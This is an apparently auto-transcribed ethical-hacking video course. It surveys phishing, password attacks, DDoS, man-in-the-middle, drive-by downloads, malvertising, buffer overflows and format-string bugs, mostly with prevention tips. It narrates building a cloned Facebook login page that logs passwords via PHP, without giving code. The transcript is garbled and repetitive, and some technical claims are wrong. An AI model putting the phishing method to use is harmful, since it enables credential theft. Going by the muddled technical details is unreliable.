the process involves five steps.
The first step is

planning the Fisher
must decide which business

to Target and determine
how to get email addresses
for the customers

of that business.
Then they must go

through the setup phase.
Once they know which business

to spoof and who their victims
are fissures create methods

for Living the messages
and collecting the data then

they have to execute the attack.
And this is the step.
Most people are familiar

with that is the fishes
and the phony message
that appears to be
from a reputable Source
after that the Fisher records

the information the victims
enter into the web page
or pop-up windows
and in the last step,
which is basically identity

theft and fraud the Fisher's use
the information they've gathered

to make illegal purchases
or otherwise commit fraud
and as many as 1/4 of

the victims never fully recover.
So how exactly can Can you

be actually preventing yourself
from getting fished?
Well, the only thing

that you can do is being aware
of how phishing
emails actually work.
So first of all,
a phishing email has

some very specific properties.
So firstly you
will have something
like a very generalized way
of addressing someone liked

your client then your message
will not be actually from a very

reputable source so out here
as you can see it's written

as Amazon on the label,
but if you actually inspect

the email address that Came
from its from management

at Maison Canada dot C A
which is not exactly

a legitimate Amazon address.
Third.
You can actually hover
over the redirect links and see
where they actually redirect you

to now this redirects me
to www.facebook.com zone.com
as you can see out here.
So basically, you know,
this is actually a phishing

email and you should actually
report this email

to your administrators
or anybody else
that you think is supposed

to be concerned with this also.

a quick demonstration.
Chinon how fishing actually

works from the perspective
of an attacker.
So first of all,
I have actually created

a phishing website for
harvesting Facebook credentials.
I simply just took

the source code
of the Facebook login page
and paste it and then made

a back-end code in PHP
which makes a log file

of all the Facebook passwords
that get actually entered

onto the fishing page now.
I've also sent myself an email.
As to make sure
this looks legitimate,
but this is only

for spreading awareness.
So please don't use
this method for actually
harvesting credentials.
That's actually a very

legal thing to do.
So, let's get started.
First of all,
you will go
to your email and see
that you'll get some emails

saying your Facebook credentials
have been compromised.
So when you open it,

it looks pretty legit.
Well, I haven't made

it look all that legit.
It should look legit.
But the point out here is

to actually make you aware
of how this works.

it says Dear client we have
strong reasons to believe
that your credentials

may have been compromised
and might have been used

by someone else.
We have locked
your Facebook account.
Please click here

to unlock sincerely
Facebook associate Dean.
So if we actually click here,
we are actually redirected

to a nice-looking Facebook page,
which is exactly
how Facebook looks like when
you're logging in now suppose.
I were to actually log

into my Facebook account,
which I won't I'll just

use some brand my
Like this is an email addres

gmail.com and let's put
password as admin 1 2 3
and we click login now
since my Facebook is actually

already logged in it will just
redirect to facebook.com
and you might just see me logged

in but on a normal computer
is just redirect you

to www.facebook.com,
which should just

show this site again.
Okay.
So once I click
login out here all
that the backend code

that I've written in PHP.
PHP out here will do is
that it's going to take

all the parameters
that have entered

into this website.
That is my email address
and the password and just

generate a log file about it.
So let's just hit

login and see what happens.

I've been redirected
to the original Facebook page

that is not meant for fishing
and on my system audio.
I have a log file
and this log file

will show exactly
as you can see are fished

out the email address.
This is an email addres
gmail.com and it's also

showed the password.
That is admin one two three.
So this is how exactly fishing

works you enter an email address
and you're entering

the email address
on a phishing website.
And then it just redirects you

to the original site.
But by this time you've already

compromised your credentials.
So always be careful
when dealing with such emails.
So now jumping back
to our session the next type

of cyber attacks.

is password adducts.
So an attempt to obtain
or decrypt a user's password
for illegal use is exactly

what a password attack is
Hackers can use cracking

programs dictionary attacks
and passwords Nippers
and password attacks

password cracking refers
to various measures used
to discover computer passwords.
This is usually accomplished

by recovering passwords
from data stored

in or transported
from a computer system password

cracking is done by
either repeatedly guessing

the password usually
through a computer algorithm

in which the computer
tries numerous combinations.
Nations under the password

is successfully discovered now
password attacks can be done

for several reasons,
but the most malicious reason is
in order to gain
unauthorized access
to a computer
with the computers owners

awareness not being in place.
Now this results
in cyber crime such as stealing

passwords for the purpose
of accessing Bank information.
Now today, there are

three common methods
used to break into

a password-protected system.
The first is a Brute

Force attack a hacker
uses a computer program
or script to try
to login with possible.
Odd combinations usually

starting with the easiest
to guess password.
So just think if a hacker

has a company list he or she
can easily guess usernames.
If even one of the users

has a password one, two,
three, he will quickly
be able to get in the next

our dictionary attacks.
Now a hacker uses a program
or script to try
to login bicycling
through the combinations
of common words in contrast

with Brute Force attacks
where a large proportion key

space is searched systematically
a dictionary attack tries

only those possibilities
which are most

likely to succeed.
Typically derived
from a list of words,
for example a dictionary

generally dictionary attacks
succeed because most people have

a tendency to choose passwords
which are short
or such as single words found

in the dictionaries
or simple easy predicted

variations on words
such as a pending a digit or so.
Now the last kind
of password attacks are used

by keylogger tax hacker uses
a program to track all
of the users keystrokes.
So at the end of the day

everything the user has typed
including the login IDs and

passwords have been recorded.
Added a keylogger attack

is different than a brute force
or dictionary attack
in many ways not the least
of which the key logging program

used as a malware
that must first make it

onto the user's device
and the keylogger attacks

are also different
because stronger passwords
don't provide much

protection against them,
which is one reason
that multi-factor authentication

is becoming a must-have
for all businesses

and organizations.
Now, the only way to stop

yourself from getting killed
in the whole password

attack conundrum is
by actually practicing
the Best practices
that are being discussed in the

whole industry about passwords.
So basically you
should update your password.
Regularly.
You should use alphanumerics
in your password and you

should never use words
that are actually
in the dictionary.
It's always advisable

to use garbage words
that makes no sense
for passwords as a just

increase your security.
So moving on we're going

to discuss DDOS attacks.
So what exactly is a DDOS

or a Dos attack?
Well, first of all,
it stands for distributed denial

of service and a Dos attack
focuses on disrupting
the service to a network
as the name suggests attackers
and high volume of data

of traffic through the network
until the network

becomes overloaded
and can no longer function.
So there are a few

different ways attackers
can achieve dos attack,
but the most common
is the distributed
denial-of-service attack.
This involves the attacker

using multiple computers
to send the traffic or data
that will overload the system

in many instances a person
may not even realize
that his or her computer

has been hijacked
and is contributing
to the Dos attack
now disrupting Services
can have serious consequences

relating to security
and online access many instances
of large-scale Dos attacks

have been implemented as
a single sign of protest

towards governments
or individuals and have led
to severe punishment
including major jail time.
So, how can you Prevent

dos attacks against yourself.
Well, firstly unless

your company is huge.
It's rare that you would be even

targeted by an outside group
or attackers for
a Dos attack your site
or network could still

fall victim to one.
However, if another organization

on your network is targeted now
the best way to prevent

an additional breach
is to keep your system as

secure as possible with
regular software updates

online security monitoring
and monitoring of your data flow

to identify any unusual
or threatening spikes in traffic
before they become a problem.
Dos attacks can also

be perpetrated by
simply cutting a table

or dislodging a plug
that connects your website
server to the Internet
so due diligence
in physically monitoring.
Your connections is
recommended as well.
Okay.
So next up on our list

is man-in-the-middle attacks.
So by impersonating
the endpoints in an online

information exchange the man
in the middle attack can obtain

information from the end user
and the entity he
or she is communicating
with for example So
if you are Banking online
the man in the middle

would communicate with you
by impersonating your bank
and communicate with the bank

by impersonating you the man
in the middle would then

receive all of the information
transferred between both parties
which could include sensitive

data such as bank accounts
and personal information.
So how does it exactly

work normally an MI t--
M gains access
through an unencrypted
wireless access point
which is basically one
that doesn't use WEP WPA or any

of the other security measures.
Then they would have

to access all the information
being transferred
between both parties by actually
spoofing something called

address resolution protocol.
That is the protocol
that is used when you

are actually connecting
to your gateway
from your computer.
So how can you exactly prevent

MIT am attacks from happening
against you firstly you have

to use an encrypted W AP
that is an encrypted
wireless access point next.
You should always

check the security
of your connection because
when somebody is actually trying

to To compromise your security.
He will try to actually

strip down the HTTP or hsts
that is being injected

in the website,
which is basically
the security protocols.
So if something
like this HTTP is not appearing

in your website,
you're on an insecure website

where your credentials
or your information
can be compromised
and the last and final measure

that you can actually
use is by investing
in a virtual private Network
which spoofs your entire IP
and you can just

browse the internet
with perfect comfort.
Next up on our list

is drive-by downloads.
So Gone are the days
where you had to click

to accept a download
or install the software update
in order to become infected
now just opening

a compromise webpage
could allow dangerous code

to install on your device.
You just need to visit or drive

by a web page without stopping
or to click accept any software
at the malicious
code can download
in the background to your device

a drive-by download refers
to the unintentional download

of a virus or malicious.
Software onto your computer
or mobile device
a drive-by download
will usually take advantage
or exploit a browser or app

or operating system
that is out of date

and has security flaws.
This initial code

that is downloaded is
often very small and
since its job is often simply

to contact another computer
where it can pull down

the rest of the code
onto your smartphone tablet
or other computers often

a web page will contain
several different types

of malicious code in hopes
that one of them will match

a weakness on your computer.
So What is this exactly what

But first you visit the site
and during the three-way

handshake connection
of the TCP IP protocol a back

in script is triggered.
As soon as a connection is made

by Al the last ack packet
is sent a download
is also triggered
and the malware is basically

injected into your system.
Now the best advice I

can share about overriding
drive-by downloads is
to avoid visiting websites
that could be considered

dangerous or malicious.
This includes adult content

file sharing websites,
or Anything that offers you

a free trip to the Bahamas
Now some other tips
to stay protected include

keep your internet browser
and operating system up-to-date

use a saved search protocol
that once you went to navigate
to a malicious site and use

comprehensive security software
on all your devices

like McAfee all access
and keeping it up to date.
Okay, so that was it

about drive-by downloads.
Next up is Mal advertising

or malvert izing.
So malvit sizing is the name

we in the security industry
give to criminally
Android advertisements
which intentionally,
in fact people and businesses.
These can be any ad
on any site often ones

which you use as a part
of your everyday internet usage

and it is a growing problem
as is evident
by a recent US Senate report
and the establishment of bodies
like trust and ads now whilst

the technology being used
in the background is
very Advanced the way presents
to the person beings infected

is simple to all intents
and purposes the advertisement

looks the same.
Same as any other

but has been placed by criminal
like you can see

the mint at out here.
It's really out of place.
So you could say it's been made

by a criminal now
without your knowledge

a tiny piece of code hidden deep
in the advertisement
is making your computer go
to the criminal servers

these and catalog details
about your computer
and its location
before choosing which piece

of malware to send you
and this doesn't need

a new browser window
and you won't know about it.
So basically you're redirected

to some criminal server.
Neither injections takes place

and voila you're infected.
It's a pretty dangerous

thing to be in.
So how exactly can you

stop ma advertising.
Well, first of all,
you need to use

an ad blocker,
which is a very must

in this day and age you
can have ad blocker extensions

installed on your browser
whether it be Chrome Safari
or Mozilla also regular

software updates of your browser
and other softwares
that work very fertile

to your browser always helps
and next is some common sense.
And yeah, Advertisement

that is about a lottery
that's offering you free money

is probably going to scam you
and inject malware to
so now we click on those ads.
So the last kind

of cyber attacks.
We are going to discover

today and discuss
about is Rogue software.
So Rogue security software is

a form of malicious software
and internet fraud that misleads

users into believing
that there is a virus

on their computer
and manipulates them

into paying money
for a fake malware removal tool.
It is a form of scare
where that money.
Lets users through fear
and a form of ransomware rock

security software has been
a serious security thread

in desktop Computing since 2008.
So now how does a rogue

security software work
these cams manipulating users
in to download the program

through a variety of techniques.
Some of these methods

include ads offering
free or trial versions
of Security Programs
often pricey upgrades
or encouraging the purchase

of deluxe versions,
then also pops warning
that your computer

is infected with the virus
which encourages you to clean.
It by clicking on the program
and then manipulated

SEO rankings that put
infected website as the top hits
when you search these links then

redirect you to a landing page
that seems your

machine is infected
and encourages you a free trial

of the Rogue security program.
Now once the scareware
is installed it can steal

all your information slow
your computer corrupt

your files disable updates
for Less timet

antivirus softwares
or even prevent you
from visiting legitimate

security software vendor sites.
Well talking about prevention.
The best defense

is a good offense.
And in this case

and updated firewall makes sure
that you have a working

one in your office
that protects you
and your employees

from these type of attacks.
It is also a good idea
to install a trusted antivirus
or anti-spyware software program
that can detect

threats like these
and also a general level

of distrust on the internet
and not actually believing

anything right off.
The bat is the way

to go teen is infected
and encourages you a free trial

of the Rogue security.
Program now once the scareware

is installed it can steal all
your information slow

your computer corrupt
your files to siebel updates
for Less timet antivirus

softwares or even prevent you
from visiting legitimate

security software vendor sites.
Well talking about prevention.
The best defense

is a good offense.
And in this case

and updated firewall makes sure
that you have a working one

in your office that protects you
and your employees

from these type of attacks.
It is also a good idea

to install a trusted antivirus
or These fiber software program
that can detect

threats like these
and also a general level

of distrust on the internet
and not actually believing
anything right off.
The bat is the way

to go the key word
of this video is
ethical hacking course,
but in reality,
it's just an expansive video

on the fundamentals
of ethical hacking.
There is no such thing
as an ethical hacking
course to be honest
because snow course
can teach you a discipline like

ethical hacking all the best
that you can do
and creating content

for ethical hacking is
that you can tell people
about the fundamentals

are followed in this discipline.
Okay.
Now before we start

let me just give you
a general idea of the topics
that I intend to cover

throughout this video.
Okay now to be honest,
we're going to cover a pretty

broad range of material.
We are first we're going

to be going over
footprinting and recognitions

where you get an idea.
What's involved in
the ethical hacking engagement
that you're working
on and information
about the Target that

you're engaged with?
Then we're going to talk

about networking fundamentals
and here we're going to get

our hands dirty with buckets
and the understanding
of dcpip at a deeper level

and also understanding
how the different protocols work

and why they work that way now.
We are also going

to be talking about cryptography
where we talk about different

cryptography key ciphers.
We're going to deal

with web encryption to SSL
and And TLS we are also going

to talk about certificates
and the creation of certificates
and how they actually
operate we will also talk

about public key cryptography
and we are also scanning

an enumeration so nmap
and dealing with Windows servers
and using SNMP and ldap

and all that sort of stuff.
Then we're going to be

talking about penetration
where we deal
with different ways
of getting into systems and also

go over using Metasploit,
which is an exploit framework,
and we're going to talk

about how to Use Metasploit
and you actually

get in the systems
and make use of the exploits
that they have then we're going

to talk about malware's viruses
and worms and rootkits and all

of that sort of stuff.
We're going to take a look

at the different pieces
of malware and how you

would pull that apart
in order to understand
what is doing and potentially
make use of that malware during

an ethical hacking engagement.
Then we're going to talk

about different types of denial
of service attacks
or dos attacks
and the difference

between a denial-of-service
attack and Distributed

denial-of-service attack,
and there is a difference there.
So we're going to go
over this docks now.
We're also going to go

over web application hacking
and the types of tools
that you would use during
web application hacking and

the different vulnerabilities
that web applications have
and how to make use

of these exploits
and those vulnerabilities.
We're going to talk

about Wireless networking
how to probe wireless networks
what wireless networks are doing
and how to secure

wireless networks.
We're also going to talk
about a little bit

about detection vation.
And to be honest with you,
the direction of Asian kind

of comes up in a lot
of different areas
through the many of the topics
that were also
going to talk about

programming programming tax
and how to protect oneself

against programming attacks.
Okay.
So that was the number of topics
that we are actually going

to cover through this video.
Now the approach
that I'm going to be taking

in the series of videos
is whenever possible.
We're going to be going

to use a Hands-On approach.
So we're going to show you

the actual All tools I'm going
to make use of and the tools

to do some sort of demonstration
and how they actually work.

I am a big believer
in getting your hands dirty as

the best way to learn anything.
So as we go through
the series of videos,
I strongly encourage you

to get access to the tools
that I'm going to

be demonstrating wherever
possible and dig in and get

your hands dirty along with me
and there are places
where we're going to be going

over some theoretical material
and I'm not a big fan

of PowerPoint slides,
but That are necessary evil
and order to convey

certain types of information.
So wherever possible I'm going

to minimize their use,
but you will run across places
where they're just a necessity

and we're going to have to go
through some slides
where in order to get

some particular points
across they are primarily

of a theoretical nature.
So that's the process

that we will be taking
through this video

and I hope you have fun
as you go along the way.
Okay.
So let's begin now

the first topic
that we're going to tackle is
what What is hacking?
Okay, so let us take a trip
to the early days

of hacking the start
with now the internet

engineering task force
is responsible for maintaining

documentation about protocols
and very specification

and processes and procedures
regarding anything
on the internet.
They have a series of documents

called the request for comments
or the rfc's and according

to RFC one three eight nine.
It says a hacker is a person
who Delights in having

and Intimate understanding
of the internal workings

of a system computers
and computer networks
in particular while
the expression hackers
may go back a long time
and have many different

connotations are definitions.
As far as computers.
Go.
Some of the earliest

hackers were members
of the tech Model Railroad Club
at the Massachusetts
Institute of Technology
and what those people did

and the various things
that they did and were involved
in a detailed and Steven Levy's
book called hackers

for Our purposes now
for our purposes

would be talking
about other types of hackers.
Although the spirit of

what we do goes back
to those early days.
Now, the definition of hacking
or hackers has changed

particularly in the 1980s
and in part as a result

of a couple of people
namely Robert T Morris

who was a Cornell graduate
who Unleashed a
piece of software
that was called a worm on

what was an early version
of the internet Forum went

on to cause a lot of damage
and create a lot of downtime

on Systems across the country
and across the world.
Now the Morris worm did end up

resulting in something good.
However, that is
computer Emergency Response Team
at Carnegie Mellon
was created primarily
in response to the mall swarm.
Now, there's also Kevin mitnick

was another well-known hacker
who was responsible

for various acts
of computer crime
over a couple of decades.
He was the first

convicted in 1988.
So the definition of hacker

or hacking move from something
benign to something
far more sinister.
In popular culture now,
we see hacking or hackers

in all sorts of popular culture.
We've seen them in hacker movies
called War Games also

the movie hackers.
Of course.
You also see in The Matrix

movies where you can see
if you look really closely
that they are using

a tool called nmap,
which we will get into the use

of in great detail later on
as we go on now.
It's the movie sneakers

and the movie SWAT fish
and on television
in other Into other places

you can see the agents
at NCIS regularly doing

things like cracking
complex cryptography in just

a matter of seconds or minutes.
So what is hacking really
well hacking is about

a deep understanding
of something particularly
with relation to
computers and Computing.
It's also about exploring and

the joy of learning new things
and understanding
them very clearly
and being able to manipulate

those things in ways
that maybe other people

haven't before it's all
about digging into problems.
To find out Solutions

in creative and interesting ways
and sometimes finding problems
where there weren't

problems previously
and that's a little bit

about what is hacking.
Okay.
So now that we have talked

about what exactly is hacking
and how the meaning
and conditions of that word

has changed over time
how it came into existence

how it was coined.
Let's go over the reasons

that people normally hack.
Now you may want

to hack just for fun
as discussed previously
hacking is a tradition.
It goes back several decades
at MIT even preceding

the computer too late definition
of hacking now MIT has a long

and storied history of hacking
and sometimes have

a computer to lated nature
which in this case
happens to be true
and sometimes a fan
on computer-related
nature instance.
Now here you can see
that MIT is home page

has been hacked
or you might even say

the faced indicate
that Disney is buying a mighty.
This was an April Fool's

Day prank and 1998.
Eight.
And again, this is just

the kind of hacking
that it would do for fun.
Rather.
Now.
Sometimes you might want

to hack just to prove
a political point or any point

for that matter in this case.
Again, Bill Gates had donated

some money to the MIT
which allowed them

to have a new building
and he was coming

to MIT to visit
and give a talk

about Microsoft Windows
and its systems.
And as you can see the the

Windows systems are installed
in the entryway at the
Or hacked to be running Linux

instead and you can see here.
That ducks.
The penguin is saying welcome
to the William Edge

Gates Building again that
some students who decided
that they wanted to make a point

about Linux and Microsoft
and windows to Bill Gates
and they thought hacking was

the best way to go about it.
Sometimes you have just

for the challenge.
Here's an example again at MIT
where some students turned

the facade of a building
into a Tetris game board.
Now, this was

a reasonably difficult hack
and the students went
after it just for the challenge

of completing it and it just
so they could have

some pride of ownership
and to be able to say
that they were able

to pull this off,
you know, the things

that teenagers do to show off
to other teenagers.
It just increases with increase
in scale now in spite

of its difficulties
and its challenges and all

the obstacles and planning
that have to go into it.

They were able to pull it off
and now they have

those bragging rights.
So that was one Them and one

of the instances
where somebody would hack just
for the challenge and

for the fun of it.
Now, sometimes you want

to hack to prevent theft
and this is where we get
more specifically in
the computer-related hackings.
You see a lot of Articles

and stories in the news
over the last few

years about cybercrime
and here is an example

of data theft compromised
and a few than

one-and-a-half million cards
for Global claimants.
So there are some attackers
who got into this

company global payment
and they were able to pull

out about a million and a half
credit card numbers

during the intrusion there.
So what you may want to do

is you may want to learn
how to hack in order

to find these holes
in your systems or applications

or employer systems
so that you can fix these holes

and prevent these compromises
from happening because of
the reputation of hit
that your company takes
where were things

like these happen.
You have the risk of completely

running out of business.
So just to protect
our job to protect Company
and protect your own

desire of business.
You may just want

to learn to hack
and that's a very good reason.
Now, you may also want

to find all the problems
that exist in your system
for putting them out

and deploying them
so that you can keep

these attackers from getting in
and stealing critical

or sensitive information.
Sometimes you may want to hack

to get there before the bad guys
and the same sort

of idea is the last one
where we're just going to talk

about and it exactly is
ethical hacking now.
We were just talking Talking

about how sometimes
you may want to hack
into your own system
before publishing it
out to the public.
Let's take Internet Explorer.

For example.
Now Internet Explorer was

actually published the public
with some critical

error in the code.
And these flaws were heavily

exploited by people
who actually found them.
Now a number of people

in the world go out looking
for these flaws
and they call themselves

security researchers
and they get in touch

with the vendors
after they found a flaw

or a bug and work.
The vendors to get it fixed
what they end up with is

a bit of reputation.
They get a name for themselves
and that name recognition

may end up getting them a job
or some speaking engagements

or book deal
or any number of ways

that you could cash in
on some name recognition

from finding the sort of bugs
and getting them fixed.
If you want to get there

before the bad guys.
You may think you're

helping out a vendor.
You may want to just

make a name for yourself.
If you want to find

these sort of bugs
before the bad guys do
because think about the bad guys
finding then is they

don't announce them
and they don't get them fixed
and that makes everybody

a little less secure.
Finally may want

to protect yourself
from hacked computer companies

and fight cyber criminals,
and this is new headline

from June 18 2012,
and we're starting

to see these sort
of news headlines show up
as companies are starting

to retaliate against attackers
in order to retaliate
against attackers.
Now in order to
retaliate against Dockers,
you need to be able

to The same sort
of skills and techniques

and knowledge and experience
that those attackers have
and where your company

may want you to learn to hack
or the company may want

to bring in people
who are skilled

at these sort of activities
so that they can

attack the Dockers
and hopefully you end up

with more Steely exterior
and you get a reputation
for not being a company
that people wanted to go

after those are several reasons.
And there you go.
I gave you around a bunch
of reasons as to why
you may want to hack.
Back for fun prove a point take

yourself to protect the company
to not run out of business
and along with another

bunch of reasons.
Okay.
So now that we have talked about

why you would want to hack.
Let's move on to the types

of hackers that exist.
Now we're going to be talking

about the different types
of hacking and the first

step of Hawking
that I want to discuss

is ethical hacking
and ethical hackers,
which is really
what we're going to be talking

about for the rest
of these lessons now

an ethical hacker is Buddy
who thinks like

a black hat hacker
or things like somebody
who is intent on breaking

into your systems
but follows a moral compass
that's more in line

with probably the majority
of the population.
So their intent isn't to do

bad things their intent
is look for bad things

and get them fixed.
So that bad things don't happen

ethical hackers aren't out
to destroy anything
and they're not out
the break anything
unless it's deemed

to be acceptable as a part
of the engagement
and also necessary.
And in order to demonstrate

a particular vulnerability
to the organization that

they're working with so
that's an ethical hacker
and there's a certification
that's available
from the ec-council.
It's a certified ethical

hacker and you know,
if you find
certifications valuable
and this sort of thing is

what do you want to do?
We're seeing a set

of certified ethical hacker
may be something you

might want to look into now.
Let's talk about

black hat hacker.
There's a plenty of cases

of black hat hackers
through yours and

let's talk about a guy.
In particular called
Kevin mitnick.
This guy right here

is a particularly
good example probably
because he was a black hat

hacker for a lot of us years.
His goal was to cause

mischief to steal
where necessary and just

to be engaged in the lifestyle
of being a hacker
and doing whatever was necessary
to continue doing
whatever it craw doing
whatever he was doing it

cross moral boundaries
or ethical boundaries.
And so Kevin mitnick here was

involved for well over a decade
and computer crime
and was finally

picked up by the FBI
and he was charged
and prosecuted and he

was eventually convicted
of some of the activities

that he was involved with now
you may be able to argue

that Kevin is a gray hat hacker
and as well and a gray

hat hacker is somebody
who kind of skirts
the line between black

and white hat Hawking
and white had Hawking

is really what
an ethical hacker is so instead

of saying ethical hacker.
You could say white hat hacker.
It's the same idea
of white hat hacker is somebody

who acts for good
if you Think of it like that
if you want to think

of it as a good versus evil
and what they're really

doing is they're in it
for the technical challenge.
They're looking to make

things better make things
more efficient improve them

in some way on the other hand.
The black hat hacker is out

for the money for the thrill.
It's really criminal activity
and a gray hat hacker is

somebody who may employ
the tactics and technique

of a black hat hacker,
but have sort of a white hat
focus in other words

they're going to do Do things
that may be malicious

and destructive in nature,
but the reason they're doing

it is to improve
the security posture

of an organization
that they're working
with so you can see
there's actually a book

called gray hat hacking.
It's a pretty good book
and it details a lot
of the tactics and strategies
and techniques will be going

over in subsequent lessons
in this video.
Now one other type of hacking
that I want to talk about is

a thing called hacktivism
and you'll find hacktivism

all over the place
and Example in the last year
or so and certainly in recent

memory is called loves security.
Yeah, you heard that right?
It's called loves security

and you can argue
that lulls is actually

a response to another type
of activism and
organization called Anonymous
started hacking companies
like Sony to protest

their involvement in a lawsuit
regarding a PlayStation
3 hacker now allow security
was supposedly testing

the treatment of anonymous
or was hacking in support

of this group Anonymous,
so they hacked number.
Of companies and the things like

pulled information usernames
and passwords from the databases

at these companies and they said
that the reason was to shine

a light on the security
of these companies
and also theoretically

embarrassed the companies
with their weak

or poor security postures
and the problem with that
that they were doing this

through were posting information
that they had found online
and that information

often included details
about customers for

these particular corporations.
And for an ethical hacker

a white hat hacker
that would cross the boundary.
Of causing harm.
So there's no reason
for me as an ethical hacker

to post information
in a public forum about somebody
because I could be doing

damage to them.
But in this case law security

and Anonymous specifically lot
of security were engaged

in the form of hacktivism
and what they were doing

was not only damaging
to the corporation
that certainly was detrimental
to those people so
different types of hackers
and different types

of hacking we've got
ethical or white hat hacking.

You've got black hat gray hat
and then we finally got Mmm,
it's really the goal
and the means that vary

from one to the other.
Okay.
So now that we've discussed

the types of hackers.
Let's also discuss the skills

necessary to become one.
So what we're going to discuss
in this part are

the different skills
that are required
or will be learned as
a part of this video.
So initially just
for basic Computing you

need a basic understanding
of operating systems
and how to work them.
There are going to be several

fundamental types of tasks
that I won't be going

into any detail at all
or and you need to know

how to run programs.
And do things like open

up a command prompt
without me walking you

through and how to do that.
So I am going to assume
that you have some basic

understanding of how to do
these sorts of tasks.
Also, you need an understanding

of the basic system software
and you'll need a basic
understanding of how to use
command line utilities.
There are a number

of tools and programs
that we're going to be going

through this video
and many of them use

the command line now
whether it's on Windows
or Linux still need

to be familiar with typing
and being able to run programs

from the command line
and the various command

line switches and parameters
that those programs are types
of programs are going to use now

from a networking perspective.
You need a basic understanding
of some simple
networking Concepts.
You need to know

what cables are and switches
and hubs and how systems

are networked together.
You don't really need

a deep level of understanding.
I'll be going
through some protocols
as reasonably deep level
because I think
it's important as
an ethical hacker to understand
what's going on
at the protocol level
so that you can know

better what you are.
Going and how to achieve

the goals and tasks
that you have before you so

we're going to be going
over some protocols.
So just understanding
what protocols are
and how they go together.
They all sort

of things are necessary
Now, we're going to also be

learning a bunch of life skills.
Yes, there are some life skills

that it's important to have.
I think the most important one

is the ability to accept failure
and persevere and by that.
I mean you're going to be just

running across several things
that just don't work

the first time around
and it's going to take

a little bit of time
and stick-to-itiveness to plug

away and keep going
until you get something to work.
And the way that you get

things to work is having
an ability to problem solve
and sometimes solving

problems requires being
a little creative.
Sometimes you need

thing out of the box
and come out a problem

from a different perspective
in order to find a solution
throughout the course

of this video.
You're going to run

across a lot of sticky problems
through the course of learning

about being an ethical hacker
and just doing the work.
Because it's not a simple.
So here's a little recipe for

how to do this now go follow
this recipe every time and

you're going to be successful.
Every situation is different.
Every system is different.
You're going to run across

some pretty sticky problems
and you're going to have to just

wait and get your hands dirty
and keep failing and failing

and failing and failing
until you find a way to succeed.
So I think those skills are

very necessary to learn
how to be an ethical hacker

digging through some
of the material
that will be going over in this.
Yo, as far as what you

are going to be learning
you're going to be learning

about how to use a lot of tools.
You're going to learn

networking and by that.
I mean we're going to be talking

about different Protocols
are evolved involved
in networking systems together,
you're going to learn

about security and security
postures security is the heart

and soul of ethical hacking.
It's why we do ethical hacking
in order to make systems

and networks more secure
than they were previously.
That's the goal

We're going to be talking

about how to read packets
from Network captures.
You're going to be going

into TCP IP related protocols
and fairly significant amount
of detail and they're

going to understand
how protocols interact

with one another.
So we're going to do all
that and the reading packets

is going to be really important
and we're going to do

a fair amount of that
in addition to just
fundamental approach to learning
how to read packets

in several lessons.
We're going to read packets

as a way of understanding
the different tools
that were using
and how they're going to learn

tactics and methodologies
and you get to learn Learn
to use the information
you've gathered in order

to get more information
and information is really

what is this all about?
You can't do much anything

without information
and sometimes it takes

a fair bit of digging in order
to find that information
and what you're going

to learn is the entry points
and the Stepping Stones

to get the information
that you need.
And then once you

have that information,
you're going to be learning

about ways to exploit it
in order to get deeper

into the dark.
You're going to learn

security awareness.
We're going to talk about risk

and understanding risks
and vulnerabilities primarily

recognize the difference
between a vulnerability
and an exploit and there's

a significant difference.
There is so security awareness

and understanding what a risk is
and how that impacts your Target
and it's going to be key
to a lot of things
that we talked about.
So it sounds like a lot

we're going to cover a fair bit
of ground not all

of it at a deep level.
Sometimes we are going

to skim the surface
but there's an an awful lot

of material to be cover.
So let's get started
into talking about the different

skills are required
or will be learned as a part

of the series of video.
So initially just
for basic Computing you
need a basic understanding

of operating systems.
So it sounds like a lot weird
that we're going to cover

and fair bit of a is going to be
at a very deep level
and sometimes we're just

going to skip the surface
but there's an awful lot

of material to cover
so let's get started.
Okay, so that was all

about the skills
that we are going to develop.
Throughout this video

and that might be necessary
for you to become

an ethical hackl.
Now.
Let's talk about

the types of attacks
that you might be dealing

with ethical hacker yourself.
So now we're going to be talking
about the types of attacks.
Now one type of attack
that you'll find common

particularly in cases
of hacktivism, for example,
or cases where people are trying

to make a particular point
or just be a general pain is
this idea of defacing defacing

goes back for quite a while.
It's the idea.
In of sort of digital graffiti
where you've left your mark

or your imprint behind
so that everybody knows you were

there primarily a website thing
and it's really just making

alterations to something
that used to be pretty common

a long time ago.
Now it's very particular

for businesses or people
or just organizations
in general to have
their homepage has been replaced

by this other thing
that was along the lines

of hey, I was here
and I took over your web page.
We also have a pretty common one
for certainly has been common

over the years.
And it's a pretty good part

towards quality exploits
in high-profile vulnerabilities.
And that's buffer overflow.

Now a buffer overflow is
a result of the way programs
are stored in memory
when programs are running

they make use of a chunk
of memory called a star
and it's just like

a stack of plates
when you put a bunch
of plates down when you pull

a plate off you're going
to pull the top plate

you're going to pull the old
displayed you're going to pull

the one that was on top.
So the same thing

with the stack here,
we're accessing memory
and This has to do with the way

functions are called in memory
when you call the function

a chunk of memory gets thrown
on top of the stack and

that's the chunk of memory
that gets accessed
and you've got a piece

of data in memory,
but in that stack and

that's called a buffer
and when too much data

is sent and try to put
into the buffer it

can overflow now the bounds
of the configured area

for that particular buffer.
It can overflow the bounds
of the configured area

for that particular buffer.
Now the way stack Are put

together we end up
with the part of the stock
where the return address

from the function is stored.
So when you overflow

the buffer you have
the ability to potentially

override that return
at which point you

can control the flow
of execution of programs.
And if you can control the flow

of execution of the program,
you can insert code
into that memory that could

be executed and that's
where we get buffer overflow

that turns into exploits
that creates the ability to get

like a command shell
or some other useful thing

from the system
where the The buffer

overflow is running.
So that's a buffer
overflow in short.
Sometimes.
We also have
format string attacks.
And sometimes these

can be precursors
to buffer overflow formats.
Now format strings come about
because the C programming

language makes use
of these format strings
that determines how data

is going to be input or output.
So you have a string

of characters that define
whether the subsequent input
or output is going
to be an integer or
whether it's going

to be a character
or whether it's going

to be a string
or a floating-point
that sort of thing.
So you have a format string
that defines the input

or the output now
for programmer leaves

of the format string
and just gets lazy

and provides only the variable
that's going to be output.
For example, you have

the ability to provide
that format string.
If you provide
that format string
what then happens is

the program starts picking
the next piece of data
of the stack displays them
because that way we

can start looking at data
that's on the stack
of the running program just

by providing a format string
if I can look at the data I

may be able to Find information
like return address
or some other use

of piece of information.
There is also a possibility
of being able to inject

data into the stock.
I may be able to
find some information
like a return address
or some other useful

piece of information.

of being able to inject data
into the stack.
I may be able to
find some information
like a return address
or some other useful

piece of information.

of being able to inject data
into the stock using

this particular type.
Now moving on to our next type

of attack is a denial
of service a denial of service.
This is a pretty common one
and you'll hear

about this a lot.
This is not to be confused with

the one that I'll be talking
about after this and that is

a distributed denial of service.
So this one that you see is
that this is a denial

